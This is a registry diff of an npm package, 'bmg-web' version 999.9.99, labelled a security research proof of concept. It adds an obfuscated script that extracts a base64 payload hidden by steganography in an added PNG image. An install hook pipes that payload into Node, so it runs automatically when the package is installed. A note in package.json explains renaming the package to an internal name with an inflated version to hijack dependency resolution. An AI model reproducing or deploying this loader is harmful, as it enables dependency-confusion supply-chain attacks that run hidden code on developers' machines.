bmg-web 999.9.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/asd.js +1 -0
- package/dolphin.png +0 -0
- package/package.json +16 -0
package/asd.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const _0xe2297d=_0x5001,_0x3a033b=_0x5001,_0x547b52=_0x5001;function _0x5001(_0x1e89c5,_0x4ab068){_0x1e89c5=_0x1e89c5-0x173;const _0x47ad39=_0x47ad();let _0x5001e7=_0x47ad39[_0x1e89c5];return _0x5001e7;}(function(_0x318a00,_0x2e44b5){const _0x4723d2=_0x5001,_0x1d81c6=_0x5001,_0x333b60=_0x5001,_0x4f0e96=_0x318a00();while(!![]){try{const _0x13cb4e=-parseInt(_0x4723d2(0x191))/0x1+parseInt(_0x1d81c6(0x184))/0x2+parseInt(_0x4723d2(0x188))/0x3*(parseInt(_0x1d81c6(0x175))/0x4)+parseInt(_0x1d81c6(0x178))/0x5*(-parseInt(_0x1d81c6(0x18b))/0x6)+parseInt(_0x4723d2(0x18f))/0x7*(-parseInt(_0x1d81c6(0x174))/0x8)+-parseInt(_0x333b60(0x17c))/0x9*(parseInt(_0x1d81c6(0x183))/0xa)+parseInt(_0x333b60(0x180))/0xb;if(_0x13cb4e===_0x2e44b5)break;else _0x4f0e96['push'](_0x4f0e96['shift']());}catch(_0x15d4ec){_0x4f0e96['push'](_0x4f0e96['shift']());}}}(_0x47ad,0x4d2ce));function _0x47ad(){const _0x3c7e18=['log','608865fZwJCl','slice','base64','800790hKDDrI','data','d\x20foun','ascii','252ClweQW','utf8','544715gBDDpN','pipe','length','21432nlOCAk','12EDeQSX','ganogr','toStri','15kcpQqa','nt32BE','from','No\x20ste','36xlbqxV','readUI','STEG','ream','11612491BSBvVi','parsed','payloa','815840VLxKif','38908lRWupc','aphic\x20','dolphi'];_0x47ad=function(){return _0x3c7e18;};return _0x47ad();}import _0x249657 from'fs';import{PNG}from'pngjs';_0x249657['create'+'ReadSt'+_0xe2297d(0x17f)](_0xe2297d(0x186)+'n.png')[_0xe2297d(0x192)](new PNG())['on'](_0x547b52(0x181),function(){const _0x515ec8=_0x547b52,_0x3398de=_0x547b52,_0x12289b=_0x547b52;let _0x31ea25='';for(let _0xa331bd=0x0;_0xa331bd<this[_0x515ec8(0x18c)][_0x515ec8(0x173)];_0xa331bd+=0x4){for(let _0x25fdb4=0x0;_0x25fdb4<0x3;_0x25fdb4++){_0x31ea25+=this[_0x515ec8(0x18c)][_0xa331bd+_0x25fdb4]&0x1;}}const _0x1a73ce=[];for(let _0x23312d=0x0;_0x23312d+0x8<=_0x31ea25[_0x12289b(0x173)];_0x23312d+=0x8){_0x1a73ce['push'](parseInt(_0x31ea25[_0x3398de(0x189)](_0x23312d,_0x23312d+0x8),0x2));}const _0x465edf=Buffer[_0x3398de(0x17a)](_0x1a73ce),_0x5729bb=_0x465edf[_0x12289b(0x189)](0x0,0x4)['toStri'+'ng'](_0x12289b(0x18e));if(_0x5729bb!==_0x3398de(0x17e))throw new Error(_0x12289b(0x17b)+_0x3398de(0x176)+_0x515ec8(0x185)+_0x12289b(0x182)+_0x12289b(0x18d)+'d');const _0x5f32e2=_0x465edf[_0x3398de(0x17d)+_0x515ec8(0x179)](0x4),_0xa58fa1=_0x465edf[_0x515ec8(0x189)](0x8,0x8+_0x5f32e2)[_0x3398de(0x177)+'ng'](_0x12289b(0x190)),_0x126214=Buffer['from'](_0xa58fa1,_0x3398de(0x18a))[_0x515ec8(0x177)+'ng'](_0x3398de(0x190));console[_0x515ec8(0x187)](_0x126214[_0x12289b(0x177)+'ng']());}),'';
|
package/dolphin.png
ADDED
|
Binary file
|
package/package.json
ADDED
|
@@ -0,0 +1,16 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "bmg-web",
|
|
3
|
+
"version": "999.9.99",
|
|
4
|
+
"description": "Security research poc. Please don't install",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"install": "node asd.js | node -"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [],
|
|
10
|
+
"license": "MIT",
|
|
11
|
+
"_poc_note": "Replace 'name' with the vulnerable package name found by the scanner. Version 9.9.9 ensures this wins over any internal version during resolution.",
|
|
12
|
+
"dependencies": {
|
|
13
|
+
"pngjs": "^7.0.0"
|
|
14
|
+
},
|
|
15
|
+
"type": "module"
|
|
16
|
+
}
|